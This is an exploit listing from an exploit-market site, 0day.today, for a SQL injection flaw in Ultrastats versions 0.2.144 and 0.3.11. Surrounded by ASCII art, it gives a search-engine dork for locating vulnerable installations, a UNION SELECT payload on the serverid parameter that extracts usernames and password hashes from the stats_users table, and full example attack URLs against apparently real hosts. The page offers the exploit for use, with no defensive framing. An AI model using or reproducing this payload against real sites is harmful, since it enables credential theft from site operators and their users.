[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability

Author
eek
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4197
Category
web applications
Date add
17-11-2008
Platform
unsorted
==========================================================================
Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability
==========================================================================


			
				                     #########
				                   #############
				                 #################
				               ####################
				              ####`   `####`   `####
				             #####|||        |||#####
				            ######|||        |||######
				           #######||| ||##|| |||#######
				           #######||||||##||||||#######
 				           ############################
 				            ###########################
        				      ######+++++++++++######
            				          #++++++++++++#
   				               ___#++++++++++++#
      				             _|   #++++++++++++|___
       				            |        ++++++++      |
      				            |_          ++        _|
         				      |_________+________|
########################################################################################################
#                         Ultrastats exploit by  eeee eeee e   e                                       #
#                         -------------------->  8    8    8   8                                       # 
#                                                8eee 8eee 8eee8e                                      #
#                                                88   88   88   8                                      #
#                                                88ee 88ee 88   8                                      #
########################################################################################################
#                                  -> Ultrastats all Versions?! Sql Injection                          #
#                                        (Version 0.3.11 & 0.2.144 tested)                             #
########################################################################################################
#                                      -> Dork: inurl:"index.php?serverid="                            #
########################################################################################################
#                                                  -> Injection:                                       #
# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--  #
#                                              and watch the Source  ;)                                #
#                                                                                                      #
#                                                 -> Example:                                          #
# -> v.  0.3.11:                                                                                       #
#                                                                                                      ##
# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
#
# -> v. 0.2.144: 
#
# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
##



#  0day.today [2024-12-25]  #